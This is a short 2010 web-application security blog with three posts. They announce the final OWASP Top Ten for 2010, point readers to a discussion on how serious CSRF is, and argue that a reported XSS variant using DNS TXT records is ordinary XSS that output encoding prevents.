Tuesday, April 20, 2010

OWASP Top10 Final Copy Released

OWASP (www.owasp.org) just released the final version of their Top Ten Risks for 2010 document. For those of you that have seen my talks on web app security, I was working off the Release Candidate so you will want to read up on this final version.


Friday, April 16, 2010

CSRF Big Deal or Not?

Great blog post about CSRF and whether it is a big deal or not.


You have to read this and then read all the comments. Great feedback plus back and forth by folks in the field. The important thing is to keep this topic and others in our minds, and share the knowledge with other developers. Only you can prevent forest fires...wait, I mean, web attacks.

Wednesday, April 7, 2010

New category of XSS attack -- so what?

In DarkReading (http://www.darkreading.com/vulnerability_management/security/app-security/showArticle.jhtml?articleID=224201569) there is a current article about a new type of XSS attack that exploits services that provide networking data, where malicious data is stored in TXT records or other back-end things and are then returned by a service where it is executed on network admin screens.

Uh...this is no different than any other XSS attack. Sure, new category. Sure, really tough to find. But hellooooo? You have input from an untrusted source (data file) that you are taking and displaying to a screen. Service developer, scrub your output! Network app screen developer, encode your output! Duh!!! Come on people. This just shows that we need to be aware that hackers are going to a deeper and deeper level in our systems. As we patch our brochureware sites, they are going to the network folks that don't care to be security developers. But we have the responsibility to do it right.

And it is easy. Please encode and stop XSS!